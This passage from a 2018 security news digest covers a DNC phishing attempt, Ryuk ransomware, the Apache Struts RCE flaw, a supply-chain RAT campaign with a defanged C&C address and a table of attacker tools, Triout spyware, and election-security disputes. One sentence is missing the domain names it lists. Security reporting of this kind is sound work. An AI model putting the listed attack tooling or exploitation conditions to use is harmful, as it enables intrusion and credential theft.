A web security firm using artificial intelligence uncovered the attempt. The DNC was notified Tuesday, it said. Hackers had created a fake login page to gather usernames and passwords in an effort to gain access to the Democratic Party’s voter file, a party official said. The file contains information on tens of millions of voters. The attempt was quickly thwarted by suspending the attacker’s account, and no information was compromised, the official said. The FBI was notified.

The official wasn’t authorized to speak about sensitive security information and spoke to The Associated Press on condition of anonymity.

Government and tech officials say it’s too early to know who was behind the attempt. The FBI declined to comment to the AP.

The attempt comes as Democrats gather for their summer meeting. The party’s cybersecurity has been an issue since the 2016 presidential election, when Russian hackers compromised DNC servers and publicly revealed internal communications that exploited divisions between Bernie Sanders’ and Hillary Clinton’s campaigns as the two candidates vied for the Democratic presidential nomination. Hackers also accessed the email accounts of Clinton’s campaign chairman, John Podesta, and systematically released the contents throughout the fall campaign.

It also comes a day after Microsoft announced it had uncovered similarly fraudulent websites created by Kremlin agents that spoofed two conservative outfits that are foes of Russia’s president, Vladimir Putin, presumably to trick unwitting visitors into surrendering credentials.

Bob Lord, the DNC’s chief security officer, said the attempt showed how serious the cyberthreat is and why it’s critical that state and federal officials work together on security.

“This attempt is further proof that there are constant threats as we head into midterm elections and we must remain vigilant in order to prevent future attacks,” Lord said in a statement.

He said President Donald Trump isn’t doing enough to protect American democracy. Previously, Trump mocked the DNC’s cybersecurity and cast doubt on U.S. intelligence officials’ findings that Russia was involved.

At a previously scheduled election security briefing Wednesday, Homeland Security Secretary Kirstjen Nielsen said the quick response to the attempted DNC hack showed that the system was working “and that different entities understand who to reach out to,” she said.

“Any attack on a political party or a campaign is important for us all to take seriously,” she said, emphasizing the government was doing all it could to help protect election systems ahead of the midterm elections. At stake is control of Congress, which could potentially switch from Republican to Democrat.

Amid the news, a Senate committee abruptly postponed a Wednesday vote on legislation to help states prevent against election hacking, frustrating Democrats and at least one Republican on the panel.

The vote was put off by the Senate Rules and Administration Committee after a bipartisan group of lawmakers spent months negotiating the legislation. The bill would aim to protect state election infrastructure by requiring that all states use backup paper ballots and conduct audits after elections, among other measures. It would also require DHS to immediately notify states if the federal government is aware that a state election system has been breached.

A Senate Republican aide said the vote was postponed because secretaries of state had complained about certain provisions, including the type of audits the bill would require. The aide said additional Republican support would be necessary to move the legislation out of committee. The aide was not authorized to speak about the committee’s reasoning and spoke on condition of anonymity.

Republican Sen. James Lankford of Oklahoma, one of the bill’s sponsors, said after the vote’s postponement: “Congressional inaction is unacceptable.”

The bill “will help states take necessary steps to further prepare our election infrastructure for the possibility of interference from not just Russia, but other possible adversaries like Iran or North Korea or a hacktivist group,” Lankford said.

The DNC committee attempt wasn’t mentioned at a Senate hearing on election security Wednesday, according to senators who were present.

States have been scrambling to secure their election systems since it was revealed that Russian hackers targeted election systems in at least 21 states in 2016, though the number is likely greater. There has been no indication any vote tallies were changed. Nielsen said at the briefing that states should have auditing systems in part as a safeguard so the public knows the vote tallies can be trusted.

In Tuesday’s incident, a scanning tool deployed by the San Francisco security company Lookout detected a masquerading website designed to harvest the passwords of users of the login page of NGP VAN, a technology provider used by the Democrats and other liberal-leaning political organizations, said Mike Murray, the company’s vice president of security intelligence. He said he contacted the DNC.

The tool, which leverages artificial intelligence, has been in development for a year and wasn’t tasked to scan any sites in particular but instead to identify phishing sites based on typical attributes, Murray said.

“This is the beauty of AI: It finds things that humans don’t know to look for,” he said.

He said the tool notified Lookout before the impostor page had even been populated with content. “As soon as we realized how fast it was developing, I decided to reach out to contacts that I know at the DNC.” Murray also contacted the website hosting company, Digital Ocean.

Ross Rustici, senior director for intelligence services at Cybereason in Boston, said a voter database is a juicy target for anyone trying to exacerbate political divisions in the U.S. or gain insight on political opponents.

“The data housed in these types of databases would be incredibly useful both for domestic opposition research as well as for foreign intelligence and counterintelligence purposes,” he said.

Microsoft Releases Intel Microcode Patches for Foreshadow Flaws
23.8.2018 securityweek

Microsoft this week made available another round of microcode updates created by Intel for mitigating the recently disclosed speculative execution vulnerabilities tracked as Foreshadow and L1 Terminal Fault (L1TF).

The Foreshadow/L1TF vulnerabilities are CVE-2018-3615, which impacts Intel’s Software Guard Extensions (SGX); CVE-2018-3620, which impacts operating systems and System Management Mode (SMM); and CVE-2018-3646, which affects virtualization software and Virtual Machine Monitors (VMM).

A piece of malware installed on a vulnerable system can exploit the flaws to gain access to potentially sensitive data stored in supposedly protected memory. The security holes affect Intel’s Xeon and Core processors.

Intel and other major tech firms have released mitigations which, in combination with the patches released previously for Meltdown, Spectre and other speculative execution vulnerabilities, should prevent attacks.

Microsoft this week released five new updates: KB4346084, KB4346085, KB4346086, KB4346087 and KB4346088. They deliver Intel’s microcode patches for Windows 10 Release To Market (RTM), Windows 10 version 1709 (Fall Creators Update), Windows Server 2016 version 1709 (Server Core), Windows 10 Version 1703 (Creators Update), Windows 10 version 1607 (Anniversary Update), Windows Server 2016, Windows 10 version 1803 (April 2018 Update), and Windows Server version 1803 (Server Core).

The microcode updates are for devices with Skylake, Kaby Lake and Coffee Lake processors, and they resolve Spectre Variant 3a (CVE-2018-3640), Spectre Variant 4 (CVE-2018-3639), and the Foreshadow flaws (CVE-2018-3615, CVE-2018-3620, CVE-2018-3646).

The mitigations for the Foreshadow vulnerabilities should not have a noticeable performance impact on consumer PCs, but performance degradation may be seen on some data center workloads.

According to Microsoft, patching the Foreshadow vulnerabilities may require both software and firmware (microcode) updates, depending on how the system is configured. However, the company says most devices running Windows client operating systems will only need software updates for protection.

Facebook Suspends Hundreds of Apps Over Data Concerns
23.8.2018 securityweek

Facebook on Wednesday said it has suspended more than 400 of thousands of applications it has investigated to determine whether people's personal information was being improperly shared.

Applications were suspended "due to concerns around the developers who built them or how the information people chose to share with the app may have been used," vice president of product partnerships Ime Archibong said in a blog post.

Apps put on hold at the social network were being scrutinized more closely, according to Archibong.

The app unit launched in March by Facebook stemmed from the Cambridge Analytica data privacy scandal.

Facebook admitted that up to 87 million users may have had their data hijacked by Cambridge Analytica, which was working for Donald Trump's 2016 presidential campaign.

Archibong said that a myPersonality app was banned by the social network for not agreeing to an audit and "because it's clear that they shared information with researchers as well as companies with only limited protections in place."

Facebook planned to notify the approximately four million members of the social network who shared information with myPersonality, which was active mostly prior to 2012, according to Archibong.

Facebook has modified app data sharing policies since the Cambridge Analytica scandal.

"We will continue to investigate apps and make the changes needed to our platform to ensure that we are doing all we can to protect people’s information," Archibong said.

Britain's data regulator said last month that it will fine Facebook half a million pounds for failing to protect user data, as part of its investigation into whether personal information was misused ahead of the Brexit referendum.

The Information Commissioner's Office began investigating the social media giant earlier this year due to the Cambridge Analytica data mishandling.

Cambridge Analytica has denied accusations and has filed for bankruptcy in the United States and Britain.

Silicon Valley-based Facebook last month acknowledged it faces multiple inquiries from regulators about the Cambridge Analytica user data scandal.

Facebook chief Mark Zuckerberg apologized to the European Parliament in May and said the social media giant is taking steps to prevent such a breach from happening again.

Zuckerberg was grilled about the breach in US Congress in April.

North Korea-linked Ryuk Ransomware used in a targeted campaign
23.8.2018 securityaffairs

Check Point reported that organizations worldwide have been targeted with the Ryuk ransomware that was developed by North Korea-linked threat actor.
Security experts from Check Point have uncovered a ransomware-based campaign aimed at organizations around the world conducted by North Korea-linked threat actor.

The campaign appears as targeted and well-planned, crooks targeted several enterprises and encrypted hundreds of PC, storage and data centers in each infected company.

Some organizations paid an exceptionally large ransom in order to retrieve the encrypted files, CheckPoint confirms that the ransom amount paid by the victims ranged between 15 BTC to 50 BTC.

At least three organizations in the United States and worldwide have been severely affected, the attackers are estimated to have already netted over $640,000 to date.

The malicious code used in the attack was tracked as Ryuk ransomware, it appears connected to Hermes malware that was associated with the notorious Lazarus APT group.

“Curiously, our research lead us to connect the nature of Ryuk’s campaign and some of its inner-workings to the HERMES ransomware, a malware commonly attributed to the notorious North Korean APT Lazarus Group, which was also used in massive targeted attacks.” reads the analysis published by Check Point.

“This leads us to believe that the current wave of targeted attacks using Ryuk may either be the work of the HERMES operators, the allegedly North Korean group, or the work of an actor who has obtained the HERMES source code.”

The HERMES ransomware was first spotted in October 2017 when it was involved in a targeted attack against the Far Eastern International Bank (FEIB) in Taiwan.

Of course, we cannot exclude that another attacker was in possession of the Hermes’ source code and used it to develop the Ryuk ransomware.

Ryuk ransomware

Experts highlighted that the encryption scheme of the Ryuk ransomware was built specifically for small-scale operations.

“Unlike the common ransomware, systematically distributed via massive spam campaigns and exploit kits, Ryuk is used exclusively for tailored attacks. In fact, its encryption scheme is intentionally built for small-scale operations, such that only crucial assets and resources are infected in each targeted network with its infection and distribution carried out manually by the attackers.” continues the report.

Experts found many similarities between the encryption logic implemented in the Ryuk’s code and the one used in the HERMES ransomware.

Continuing the analysis, the experts discovered that both ransomware uses a quite identical dropper.

When executed the Ryuk ransomware conducts a Sleep of several seconds, then it checks if it was executed with a specific argument and then kills more than 40 processes and over 180 services associated with to antivirus, database, backup and document editing software.

The ransomware destroys its encryption key and deletes shadow copies and various backup files from the disk in order to prevent victims from recovering their files.

It is interesting to note that almost all of the Ryuk ransomware samples analyzed by the experts were provided with a unique wallet. Once the victims have paid the ransom, the attackers divided the funds and transmitted them through multiple accounts.

“From the exploitation phase through to the encryption process and up to the ransom demand itself, the carefully operated Ryuk campaign is targeting enterprises that are capable of paying a lot of money in order to get back on track.” concludes CheckPoint.

“Both the nature of the attack and the malware’s own inner workings tie Ryuk to the HERMES ransomware and arouse curiosity regarding the identity of the group behind it and its connection to the Lazarus Group.” Check Point says.

Expert discovered a Critical Remote Code Execution flaw in Apache Struts (CVE-2018-11776)
23.8.2018 securityaffairs

Maintainers of the Apache Struts 2 open source development framework has released security updates to address a critical remote code execution vulnerability.
Security updates released this week for the Apache Struts 2 open source development framework addressed a critical RCE tracked as CVE-2018-11776.

The vulnerability affects Struts versions from 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

The versions Struts 2.3.35 and 2.5.17 includes the security updates to address the CVE-2018-11776.

Struts developers also published a temporary workaround, but are recommending users to don’t use it and install the updates.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action se” reads the security advisory published by Apache.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set.”

apache struts 2 flaw

Experts warn that it is possible to trigger the RCE flaw when namespace value isn’t set for a result defined in underlying xml configurations and at the same time, its upper action(s) configurations have no or wildcard namespace.

The flaw could be also exploited when using url tag which doesn’t have value and action set and at the same time, its upper action(s) configurations have no or wildcard namespace.

The vulnerability was reported by Man Yue Mo from the Semmle Security Research team on April 10, security updates were released on June 25 and on 22 August 2018 the new versions of Struts were released.

“This vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework. Due to the fact that this vulnerability affects the core of Struts, there exist multiple separate attack vectors. At the moment, we are aware of two such vectors” reads the technical analysis published bb Semmle.

“For your application to be vulnerable to the attack vectors described below, both of the following conditions should hold:

The alwaysSelectFullNamespace flag is set to true in the Struts configuration. Note that this is automatically the case if your application uses the popular Struts Convention plugin.
Your application’s Struts configuration file contains an <action …>tag that does not specify the optional namespace attribute, or specifies a wildcard namespace (e.g. “/*”)”
The experts from Semmle explained that the flaw affects commonly-used endpoints of Struts which are likely to be exposed.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

Apache Struts flaw are very dangerous for organizations, one of them was the root cause of the massive Equifax breach that impacted over 140 million people.

Operation Red Signature – South Korean Firms victims of a supply chain attack
23.8.2018 securityaffairs BigBrothers

Supply Chain Attack Hits South Korean Firms
Security researchers from Trend Micro have uncovered a supply chain attack, tracked as Operation Red Signature, against organizations in South Korea.
The Operation Red Signature aimed at delivering a remote access Trojan (RAT) used by attackers to steal sensitive information from the victims.

Threat actors compromised update server of a remote support solutions provider, using this attack scheme hackers infected the victims with the 9002 RAT backdoor.

“Together with our colleagues at IssueMakersLab, we uncovered Operation Red Signature, an information theft-driven supply chain attack targeting organizations in South Korea. We discovered the attacks around the end of July, while the media reported the attack in South Korea on August 6.” reads the analysis published by TrendMicro.

The malicious code delivered by the attackers was signed with a valid digital certificate that was stolen, attackers also changed the configuration of the update server to deliver the malware only to organizations within a specified range of IP addresses.

According to Trend Micro, the attackers likely stole the code signing certificate in April and used it to sign the malicious update files then uploaded them on their servers.

Then the hackers compromised the server used to deliver the update and configured it to retrieve an file from the server controlled by the attackers.

Researchers observed that the 9002 RAT was also used to deliver additional payloads, such as an exploit tool for Internet Information Services (IIS) 6 WebDav (exploiting CVE-2017-7269) and an SQL database password dumper.

Hackers used the tools to steal data stored in their target’s web server and database.

supply chain attack Operation Red Signature

“The file contains an update.ini file, which has the malicious update configuration that specifies the remote support solution program to download and and extract them as rcview40u.dll and rcview.log to the installation folder.” continues the analysis.

“The program will then execute rcview40u.dll, signed with the stolen certificate, with Microsoft register server (regsvr32.exe). This dynamic-link library (DLL) is responsible for decrypting the encrypted rcview.log file and executing it in memory. 9002 RAT is the decrypted rcview.log payload, which connects to the command-and-control (C&C) server at 66[.]42[.]37[.]101.”

The analysis of the 9002 RAT backdoor revealed it was compiled on July 17, 2018, and the configuration files inside were created on July 18. On July 18, the remote support program’s update process started, experts noticed that the 9002 RAT used supply chain attack was set to be inactive in August.

The RAT can fetch a long list of hacking tools reported in the following table:

Here’s a list of files that 9002 RAT retrieves and delivers to the affected system:

Filename Tool Purpose
dsget.exe DsGet View active directory objects
dsquery.exe DsQuery Search for active directory objects
sharphound.exe SharpHound Collect active directory information
aio.exe All In One (AIO) Publicly available hack tool
ssms.exe SQL Password dumper Dump password from SQL database
printdat.dll RAT (PlugX variant) Remote access tool
w.exe IIS 6 WebDav Exploit Tool Exploit tool for CVE-2017-7269 (IIS 6)
Web.exe WebBrowserPassView Recover password stored by browser
smb.exe Scanner Scans the system’s Windows version and computer name
m.exe Custom Mimikatz (including 32bit / 64bit file) Verify computer password and active directory credentials
“Supply chain attacks don’t just affect users and businesses — they exploit the trust between vendors and its clients or customers. By trojanizing software/applications or manipulating the infrastructures or platforms that run them, supply chain attacks affects the integrity and security of the goods and services that organizations provide,” Trend Micro concludes.

Bitdefender spotted Triout, a new powerful Android Spyware Framework

23.8.2018 securityaffairs Android

Security researchers from Bitdefender have spotted a new Android spyware framework dubbed Triout that could be used to create malware with extensive surveillance capabilities.
Bitdefender researchers have identified a new spyware framework can be used to spy into Android applications, it is tracked as Triout and first appeared in the wild on May 15.

The researcher revealed that the command and control (C&C) server has been running since May 2018 and at the time of the report it was still up and running.

Triout was first submitted on May 15 to VirusTotal, although the first sample was uploaded from Russia, most of the other ones came from Israel.

The malware was likely spread through third-party marketplaces or domains controlled by the attackers that host the malicious code.

“Discovered by Bitdefender’s machine learning algorithms on 20.07.2018, the sample’s first appearance seems to be 15.05.2018, when it was uploaded to VirusTotal. The application seems to be a repackaged version of “com.xapps.SexGameForAdults” (MD5: 51df2597faa3fce38a4c5ae024f97b1c) and the tainted .apk fi le is named 208822308.apk.” reads the report published by Bitdefender.

“The original app seems to have been available in Google Play in 2016, but it has since been removed. While it’s unclear how the tainted sample is being disseminated, third-party marketplaces or some other attacker-controlled domains are likely used to host the sample.”

Bitdefender pointed out that the analyzed sample was unobfuscated a circumstance that leads the experts into believing the framework may be a work-in-progress.

“This could suggest the framework may be a work-in-progress, with developers testing features and compatibility with devices,” continues the report.

The Triout spyware was discovered analyzing a tainted application that maintained all the original features. The sample analyzed by Bitdefender was a repackaged version of an adult application that was listed in Google Play in 2016, but was since removed. This means that attackers might have made it available through third-party channels.


Triout implements extensive surveillance capabilities, including:

Records every phone call (literally the conversation as a media fi le), then sends it together with the caller id to the C&C (incall3.php and outcall3.php)
logs every incoming SMS message (SMS body and SMS sender) to C&C (script3.php)
Has capability to hide self
Can send all call logs (“content://call_log/calls”, info: callname, callnum, calldate, calltype, callduration) to C&C (calllog. php)
Whenever the user snaps a picture, either with the front or rear camera, it gets sent to the C&C (uppc.php, fi npic.php or reqpic.php)
Can send GPS coordinates to C&C (gps3.php)
Technical details are included in the report published by Bitdefender.

Iran-Linked Influence Campaign Targets US, Others
22.8.2018 securityweek BigBrothers

Threat actors apparently working out of Iran have been conducting an operation whose goal is to influence the opinions of people in the United States and other countries around the world, FireEye reported on Tuesday.

This campaign, which the cybersecurity firm describes as an “influence operation,” involves a network of “inauthentic” news websites and clusters of social media accounts whose apparent purpose is to “promote political narratives in line with Iranian interests.”

The sites that FireEye calls “inauthentic” make an effort to hide their origins and affiliations, and rely on fake social media personas to promote content. This content is either original, copied from other sources, or taken from other sources and modified.Iran runs influence operation

The campaign, which has been active since at least 2017, focuses on anti-Israel, anti-Saudi, and pro-Palestine topics. The threat actor behind the operation has also distributed stories regarding U.S. policies that are favorable to Iran, including the Joint Comprehensive Plan of Action nuclear deal.

In addition to the United States, the group’s targets include the United Kingdom, Latin America and the Middle East.

FireEye researchers have found several pieces of evidence suggesting that Iran is behind the operation. This includes domains registered with email addresses associated with Iranian organizations, Twitter accounts registered with phone numbers with Iran’s +98 country code, and online personas promoting Iranian holidays.

However, the company says it’s only “moderately confident” that Iran is behind the activity, mainly due to the fact that this is an influence operation, which are meant to be deceptive.

The cybersecurity firm noted that the Iran-linked threat actor tracked as APT35, NewsBeef, Newscaster and Charming Kitten has also leveraged these types of inauthentic news sites and social media personas in its cyber espionage operations, but there is no evidence that this influence campaign has been conducted by APT35.

“The activity we have uncovered is significant and demonstrates that actors beyond Russia continue to engage in online, social media-driven influence operations as a means of shaping political discourse,” said Lee Foster, Manager of Information Operations Analysis at FireEye. “It also illustrates how the threat posed by such influence operations continues to evolve, and how similar influence tactics can be deployed irrespective of the particular political or ideological goals being pursued.”

FireEye is preparing a report containing technical details on the operation. The report will be shared on request.

Microsoft Disrupts Election-Related Domains Used by Russian Hackers
22.8.2018 securityweek BigBrothers

Microsoft on Monday announced that it took control of several domains associated with a notorious Russia-linked threat actor. The names of the domains suggest the hackers may have been using them in campaigns related to the upcoming midterm elections in the United States.

The tech giant’s Digital Crimes Unit obtained a court order to take control of six domains created by a threat group tracked as APT28, Fancy Bear, Pawn Storm, Strontium, Sednit, Tsar Team and Sofacy.

APT28, which experts believe is sponsored by Russia’s GRU intelligence agency, has been known to launch politics-focused campaigns, including ones aimed at the latest presidential elections in the United States and France. The group may now be targeting the upcoming midterm elections in the U.S.

The domains seized by Microsoft are,,,, and

The first domain appears to mimic the International Republican Institute, a non-profit that receives funding from the U.S. government to promote democracy around the world. The second domain appears to impersonate the Hudson Institute, a politically conservative non-profit think tank. The other domains mimic the website of the U.S. Senate and Microsoft’s Office 365 service.

While the domains may have been set up for election-related campaigns, Microsoft says it currently has no evidence that any of them were successfully used in attacks, and it’s unclear exactly who the hackers intended on targeting using these domains.

The company revealed last month that it had spotted some Microsoft phishing domains that had apparently been set up as part of attacks aimed at the campaigns of three congressional candidates who are running in the upcoming midterm elections.

“Microsoft has notified both nonprofit organizations. Both have responded quickly, and Microsoft will continue to work closely with them and other targeted organizations on countering cybersecurity threats to their systems. We’ve also been monitoring and addressing domain activity with Senate IT staff the past several months, following prior attacks we detected on the staffs of two current senators,” Brad Smith, Microsoft’s president and chief legal officer, said in a blog post.

This is not the first time Microsoft has seized domains used by APT28. The company says it has used court orders a total of 12 times over the past two years to shut down 84 fake websites linked to the threat group.

Sean Sullivan, Security Advisor at F-Secure, cautioned that the domains targeted by Microsoft may not necessarily be related to elections.

“Microsoft’s announcement is generating a lot of attention and the focus is overwhelmingly centered on the 2018 mid-term elections. But it’s important not to lose sight of the bigger issue,” Sullivan told SecurityWeek. “The focus on think tanks holding pro-sanction views on Russia’s current regime is about espionage. In short: spies are going to spy. That’s true whether or not it’s an election year. There seems to be a rush to conclude that these six domains are part of an “attack” on the elections that risks missing the complete threat model – and therefore the complete countermeasures that should be taken.”

Microsoft took this opportunity to announce its new AccountGuard initiative, which provides free cybersecurity protection to candidates, campaigns and political institutions using Office 365.

The AccountGuard service, which is part of Microsoft’s Defending Democracy Program, involves notifications about threats, security guidance and education, and the opportunity to test preview releases of new security features.

AccountGuard is currently available only in the United States, but Microsoft plans on offering it in other countries as well in the coming months.

Hacking Elections: Georgia's Midterm Electronic Voting in the Dock
22.8.2018 securityweek BigBrothers

The security of electronic voting and the direct-recording election (DRE) voting machines used has been questioned for years. The upcoming U.S. midterm elections in November, coupled with the attempted Russian meddling in the 2016 presidential election, have made this a current and major concern for many in the security industry and beyond. Now it has gone to court.

Earlier this month (Aug. 3), the Coalition for Good Governance filed a Motion for Preliminary Injunction against the Secretary of State for Georgia (Brian Kemp, who is also the Republican candidate for governor in the midterms) seeking to force the state to abandon DREs and revert to a paper ballot.

The Secretary of State has responded to the Motion, claiming, “Such recklessness, if given the power of a federal decree, would compromise the public interest.”

Security concerns

Concern over the security of electronic voting was heightened following the 2016 presidential election. The incumbent Obama administration accused Russia of interfering and being behind a breach of the DNC and subsequent leak of sensitive data.

For the most part it is believed that Russia attempted to influence rather than control the vote. However, an NSA document acquired and discussed by The Intercept in June 2017 “raises the possibility that Russian hacking may have breached at least some elements of the voting system, with disconcertingly uncertain results.”

There is no claim that Russia affected the outcome of the election. The primary concern is that nobody knows the extent of what was done, nor what could have been done – and, more disconcertingly, what might be done next time.

The vulnerability of the DRE systems themselves is hardly doubted. At the end of 2016, both Cylance and Symantec separately demonstrated hacks against DREs. This month DEF CON ran its second annual Vote Hacking Village, where attendees were invited to hack the voting infrastructure, including DREs – and numerous vulnerabilities were found and exploited.

DRE manufacturers, and officials using them, are quick to point out most exploits require physical access to the machines, and that any individual hack would only affect the votes made on that system. The overall vote itself will remain statistically valid.

Last week (Aug. 13), a new survey from Venafi found that 93% of more than 400 IT security professionals from the U.S., UK and Australia found that “are concerned about cyber-attacks targeting election infrastructure and data.” Furthermore, “81% believe cyber criminals will target election data as it is transmitted between machines, software and hardware applications, and moved from local polling stations to central aggregation points.”

The voting infrastructure is much wider than vulnerable DREs alone.

Court case in Georgia

The Coalition for Good Governance is attempting to gain a court order to force Georgia to abandon electronic voting and go back to a paper-based ballot because it does not believe a full and fair vote can be guaranteed. It has asked for a Preliminary Injunction.

Georgia stands out from the majority of states. Although not one of the perennial swing votes, these midterms are likely to be different, and a relatively few votes could swing the result one way or the other.

Georgia uses approximately 27,000 Diebold AccuVote DRE touchscreen voting units running a modified version of Windows CE. It does not and cannot produce a paper audit trail of votes. Georgia is one of just a few states – and the largest – that does not produce a paper backup.

The Coalition’s argument hinges on three elements: that DREs are inherently insecure; that Georgia’s voting system has already been breached; and that Georgia voting officials destroyed all evidence of who might have benefited from the breach.

The breach was discovered by security researcher Logan Lamb. The court document states, “In late August 2016, cybersecurity researcher Logan Lamb accessed files hosted on the server on the public internet, including the voter histories and personal information of all Georgia voters, tabulation and memory card programming databases for past and future elections, instructions and passwords for voting equipment administration, and executable programs controlling essential election resources.”

This database, including registration details for 6.7 million Georgia voters, was unprotected and could be accessed by anybody with an internet connection.

Richard DeMillo, director of Georgia Tech's Center for 21st Century Universities, told SecurityWeek, “If I were a hacker trying to affect an election in this state, that's where I would start. Because once you have access to those databases, you can, for example, on election day send people to the wrong polling stations. I actually think that this is a line of attack that people haven't looked at which has to do with simply changing contact information for voters.”

DeMillo is a professor at Georgia Tech, has worked in cybersecurity for more than 40 years, and, he says, is “a longtime observer of election security in the state of Georgia.” He is not an official advisor to the Coalition, but as an employee of a public university is available to offer advice to anyone who seeks it.

The concern for the Coalition is that firstly, Georgia did little to secure the database – it remained online and available to everyone for at least six months before it was removed; secondly, that Georgia did not undertake a forensic examination to determine whether the database had been altered or manipulated; and thirdly, three days after the Coalition’s lawsuit was filed, election officials “destroyed all data on the hard drives of the KSU server.”

There is consequently now no way of knowing who may have accessed that database nor whether any unauthorized changes were made to it.

Marilyn R. Marks, VP and executive director of the Coalition for Good Governance, described another potential attack against the Georgia midterms that would be relatively easy if the pollbooks stored at KSU had been downloaded or amended by attackers.

“One of [Demillo’s] colleagues went to vote, and he was issued the wrong ballot (his affidavit is in the Exhibits of the Motion),” Marks told SecurityWeek. “Name is Kadel. He was given the wrong electronic ballot. If you look at his voter registration record, name address, everything's just fine. We do not know what happened.” His ballot paper seemed to be in order, but was for Congressional District 5 instead of Congressional District 6. Had he not noticed this discrepancy his vote would have been nullified.

“But here's another theoretical attack,” continued Marks. “You can leave all that stuff there. But change the ballot combination code that's in the electronic pollbook and the voter gets issued the wrong ballot. Nobody knows what their ballot combination is. It's not given out to voters.”

Rob Kadel is assistant director for research in education innovation, Center for 21st Century Universities at Georgia Tech.

The Secretary of State’s response to the Coalition’s motion is to concentrate on the physical problems of changing to paper at this stage. The response does not attempt to prove that DRE machines are secure, but states that the Coalition has not proven them to be insecure. It describes the motion as ‘Plaintiff’s paranoia’, and says, “Luddite prejudices against software technology are insufficient justification to override a statutory regime promulgated by duly-elected legislators, sustained against prior constitutional challenges, and overseen by state officials acting pursuant to their respective duties within that legislative framework.”

Both sides vehemently disagree. The Coalition was set to file its own reply to Kemp’s response on Monday (SecurityWeek will post the URLs to this and to Secretary Kemp’s initial response as soon as they become available). The reply is likely to assert that a switch to paper is feasible within the time constraints.

Industry views on the midterms in Georgia

The outcome of the Motion for Preliminary Injunction will be decided by the court, and probably very quickly. In the meantime, SecurityWeek talked to several security experts for their view on the current situation.

“The key to any voting system is the integrity of the data, and given the proven attacks against the DRE systems, this can no longer be guaranteed,” commented Joseph Kucic, CSO at Cavirin. “Without evidence of having the appropriate controls there is a good chance that the plaintiffs could win their case. With regard to the actual motion, any difficulties with paper ballot deployment – and there should not be many – are more than made up for by the potential risks of a compromised system.”

Not everyone agrees. Sanjay Kalra, co-founder and chief product officer at Lacework, told SecurityWeek, “Moving backwards to paper-based systems is not only inefficient, it’s also not materially any more secure. Hackers want to disrupt and steal, which they will do aggressively, irrespective of medium or platform. For those running digital election systems, the vision should be to use a best practices approach along with tools that support awareness and remediation to provide the best protection against bad actors. Those responsible for data protection must always seek to balance efficiency, user experience and security.”

“There’s a compelling case to be made on both sides,” says Abhishek Iyer, technical marketing manager at Demisto. Reverting to paper is supported by the general lack of confidence in the security of DREs and the known voter data leaks. “However,” he adds, “with impending midterm elections, there’s not enough time to execute an end-to-end change and go back to paper-based voting; improper transition could result in voter confusion, error, and inadvertent suppression (since electronic systems are also used to verify voter registration).”

Marilyn Marks disagrees. “There’s no new voting system needed, and no new equipment,” she told SecurityWeek. “They already use paper ballots (for example, for postal votes). They just need to dispense with the touchscreen machines, put paper votes into ballot boxes to be transported to the election office and use the scanners they already have to scan the votes in quantity. All that is needed is more of the same paper ballots – and the printers still have many weeks to do that.”

Ryan Jones, managing principal at Coalfire Labs, didn’t want to comment on any legal aspects between the Coalition for Good Governance and the secretary of state for Georgia. But he did say, “We have assessed not only voting machines, but also the Voluntary Voting System Guidelines standard – by which most voting machines are gauged – as well as the end-to-end gaps in pre-election, election, and post-election processes. We can say with some assurance,” he confirmed, “that machines in their current state, despite having met the VVSG standard, have many technical aspects that can be compromised by a diligent hacker that looks at the hacking challenge across the entire system and process. We have compromised multiple voting systems in a lab setting in as little as two minutes; and as news reports attest, an 11-year-old also recently hacked a voting environment at a security conference.” [DEF CON’s Vote Hacking Village.]

Last word goes to Professor Rich Demillo. “Georgia is the largest state that does not use auditable elections equipment; so, if I were in the attackers' shoes and was looking for a return on investment, this is the kind of state that I would look at -- a state where the races are likely to be tight and where the chance of me being discovered is going to be slim because by design it is impossible to verify after the election that there was a breach.”

It is now up to the court to decide whether well-documented flaws in the existing electronic voting infrastructure combined with the lack of any auditing capability are sufficiently serious to force a last-minute switch back to paper-based voting in the Georgia state midterm elections in November.

Google Warns Thousands Each Month of State-Sponsored Attacks
22.8.2018 securityweek Attack

Each month, Google sends thousands of warnings to users who might have been targeted in government-backed attacks, even if the attempts have been blocked.

Highly targeted and more sophisticated when compared to typical phishing attempts, which are mainly focused on financial fraud, these state-sponsored attacks come from dozens of countries worldwide, Google says.

Only an extremely small fraction of Google’s users have received such an alert, and they don’t necessarily mean that accounts have been compromised, but the search giant urges all of those who receive the notification to take immediate action.

“We hope you never receive this type of warning, but if you do, please take action right away to enhance the security of your accounts,” Google says.

Users are also provided with guidance on how to improve the security of their accounts, but they can choose to dismiss the warning.

The Internet company has been issuing such alerts since 2012, and recently also brought the warnings to G Suite. Thus, administrators receive an alert when the company detects a possible government-backed phishing attempt targeting a user in the admin’s corporate network.

The warnings themselves have evolved over time from simple text messages displayed at the top of recipient’s Gmail page to more prominent banners.

Such warnings don’t arrive immediately after the phishing attempt was detected, but are sent periodically, to ensure that the attackers can’t determine the technology that allows Google to detect the attacks.

“We intentionally send these notices in batches to all users who may be at risk, rather than at the moment we detect the threat itself, so that attackers cannot track some of our defense strategies. We have an expert team in our Threat Analysis Group, and we use a variety of technologies to detect these attempts,” Google reveals.

In addition to alerting the user, the web search company informs the law enforcement on the detected attempts, so they can investigate the incidents on their own.

To improve the security of their accounts, all users are advised to enable two-step verification in Gmail. Those who believe they might be targeted by government-backed phishing should also consider enrolling in the Advanced Protection Program, Google underlines.

Microsoft Rolls Out End-to-End Encryption in Skype
22.8.2018 securityweek

Skype users on the latest version of the messaging application can now take full advantage of end-to-end encryption in their conversations, Microsoft says.

Rolled out under the name of Private Conversations, the feature was initially introduced for a few Skype users in January this year, as preview, and is now available in the latest version of Skype on Windows, Mac, Linux, iOS and Android (6.0+). It started arriving on desktops a couple of weeks ago.

Private Conversations, which takes advantage of the industry standard Signal Protocol by Open Whisper Systems, secures text chat messages and audio calls, along with any files the conversation partners share over Skype (including photo, audio, and video files).

